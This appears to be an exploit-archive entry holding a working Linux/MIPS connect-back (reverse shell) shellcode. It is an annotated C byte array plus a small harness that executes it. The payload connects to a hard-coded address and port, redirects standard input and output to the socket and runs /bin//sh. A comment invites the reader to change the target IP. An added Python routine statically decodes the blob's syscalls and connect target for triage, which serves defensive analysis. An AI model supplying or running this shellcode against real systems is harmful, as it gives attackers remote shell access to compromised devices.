Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
Source: imrigan [sobachka] gmail.com  Author: rigan  Published: 2011-12-12

/*
 * Title: Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
 * Author: rigan - imrigan [sobachka] gmail.com
 */

#include <stdio.h>

char sc[] =
         "\x24\x0f\xff\xfd"        // li      t7,-3
         "\x01\xe0\x20\x27"        // nor     a0,t7,zero
         "\x01\xe0\x28\x27"        // nor     a1,t7,zero
         "\x28\x06\xff\xff"        // slti    a2,zero,-1
         "\x24\x02\x10\x57"        // li      v0,4183 ( sys_socket )
         "\x01\x01\x01\x0c"        // syscall 0x40404
 
         "\xaf\xa2\xff\xff"        // sw      v0,-1(sp)
         "\x8f\xa4\xff\xff"        // lw      a0,-1(sp)
         "\x24\x0f\xff\xfd"        // li      t7,-3 ( sa_family = AF_INET )
         "\x01\xe0\x78\x27"        // nor     t7,t7,zero
         "\xaf\xaf\xff\xe0"        // sw      t7,-32(sp)
         "\x3c\x0e\x7a\x69"        // lui     t6,0x7a69 ( sin_port = 0x7a69 )
         "\x35\xce\x7a\x69"        // ori     t6,t6,0x7a69
         "\xaf\xae\xff\xe4"        // sw      t6,-28(sp)
        
      /* ====================  You can change ip here ;) ====================== */
         "\x3c\x0d\xc0\xa8"        // lui     t5,0xc0a8 ( sin_addr = 0xc0a8 ...
         "\x35\xad\x01\x64"        // ori     t5,t5,0x164           ...0164 )
      /* ====================================================================== */
     
         "\xaf\xad\xff\xe6"        // sw      t5,-26(sp)
         "\x23\xa5\xff\xe2"        // addi    a1,sp,-30
         "\x24\x0c\xff\xef"        // li      t4,-17 ( addrlen = 16 )    
         "\x01\x80\x30\x27"        // nor     a2,t4,zero
         "\x24\x02\x10\x4a"        // li      v0,4170 ( sys_connect )
         "\x01\x01\x01\x0c"        // syscall 0x40404
 
         "\x24\x0f\xff\xfd"        // li      t7,-3
         "\x01\xe0\x28\x27"        // nor     a1,t7,zero
         "\x8f\xa4\xff\xff"        // lw      a0,-1(sp)
//dup2_loop:
         "\x24\x02\x0f\xdf"        // li      v0,4063 ( sys_dup2 )
         "\x01\x01\x01\x0c"        // syscall 0x40404
         "\x20\xa5\xff\xff"        // addi    a1,a1,-1
         "\x24\x01\xff\xff"        // li      at,-1
         "\x14\xa1\xff\xfb"        // bne     a1,at, dup2_loop
 
         "\x28\x06\xff\xff"        // slti    a2,zero,-1
         "\x3c\x0f\x2f\x2f"        // lui     t7,0x2f2f
         "\x35\xef\x62\x69"        // ori     t7,t7,0x6269
         "\xaf\xaf\xff\xf4"        // sw      t7,-12(sp)
         "\x3c\x0e\x6e\x2f"        // lui     t6,0x6e2f
         "\x35\xce\x73\x68"        // ori     t6,t6,0x7368
         "\xaf\xae\xff\xf8"        // sw      t6,-8(sp)
         "\xaf\xa0\xff\xfc"        // sw      zero,-4(sp)
         "\x27\xa4\xff\xf4"        // addiu   a0,sp,-12
         "\x28\x05\xff\xff"        // slti    a1,zero,-1
         "\x24\x02\x0f\xab"        // li      v0,4011 ( sys_execve )
         "\x01\x01\x01\x0c";       // syscall 0x40404
        
int main(void)
{
       void (*s)(void);

       /* sizeof(sc) counts the string's trailing NUL, so subtract one */
       printf("size: %zu\n", sizeof(sc) - 1);
       s = (void (*)(void))sc;
       s();
       return 0;
}
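
For triage of a captured blob like this one, the syscall sequence and the connect destination can be read statically from the instruction words. The Python sketch below is an added example, not part of rigan's original code; `triage`, `SAMPLE` and `STACK_BASE` are names assumed here, and the decoder models only the opcodes this listing uses.

```python
import ipaddress
import struct

# Syscall numbers as annotated in the listing above (Linux/MIPS o32 ABI).
SYSCALLS = {4183: "socket", 4170: "connect", 4063: "dup2", 4011: "execve"}
ZERO, V0, A1, SP = 0, 2, 5, 29
STACK_BASE = 0x7FFF0000  # assumed placeholder value for sp; any value works

# First 22 instruction words of the listing (up to the connect syscall).
SAMPLE = bytes.fromhex(
    "240ffffd01e0202701e028272806ffff240210570101010c"
    "afa2ffff8fa4ffff240ffffd01e07827afafffe03c0e7a69"
    "35ce7a69afaeffe43c0dc0a835ad0164afadffe623a5ffe2"
    "240cffef018030272402104a0101010c"
)


def triage(code: bytes):
    """Linear sweep (branches not followed) over big-endian MIPS32 code.

    Returns (syscall names in order, (family, ip, port) passed to connect).
    """
    regs, mem = {ZERO: 0, SP: STACK_BASE}, {}
    calls, peer = [], None
    for (w,) in struct.iter_unpack(">I", code[: len(code) // 4 * 4]):
        op, rs, rt, rd = w >> 26, (w >> 21) & 31, (w >> 16) & 31, (w >> 11) & 31
        imm = w & 0xFFFF
        simm = imm - 0x10000 if imm & 0x8000 else imm
        if op == 0x0F:                          # lui rt, imm
            regs[rt] = imm << 16
        elif op == 0x0D:                        # ori rt, rs, imm
            regs[rt] = regs.get(rs, 0) | imm
        elif op in (0x08, 0x09):                # addi/addiu (also "li")
            regs[rt] = (regs.get(rs, 0) + simm) & 0xFFFFFFFF
        elif op == 0x2B:                        # sw rt, simm(rs)
            addr = regs.get(rs, 0) + simm
            for i, b in enumerate(struct.pack(">I", regs.get(rt, 0))):
                mem[addr + i] = b
        elif op == 0 and w & 0x3F == 0x27:      # nor rd, rs, rt
            regs[rd] = ~(regs.get(rs, 0) | regs.get(rt, 0)) & 0xFFFFFFFF
        elif op == 0 and w & 0x3F == 0x0C:      # syscall: number is in v0
            nr = regs.get(V0)
            calls.append(SYSCALLS.get(nr, f"unknown({nr})"))
            if nr == 4170:                      # connect(fd, a1=sockaddr, len)
                raw = bytes(mem.get(regs.get(A1, 0) + i, 0) for i in range(8))
                family, port = struct.unpack(">HH", raw[:4])
                peer = (family, str(ipaddress.IPv4Address(raw[4:])), port)
        regs[ZERO] = 0                          # $zero is hard-wired
    return calls, peer
```

Run over the full 168-byte array, the same sweep also reports the `dup2` and `execve` calls that follow the connect.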


 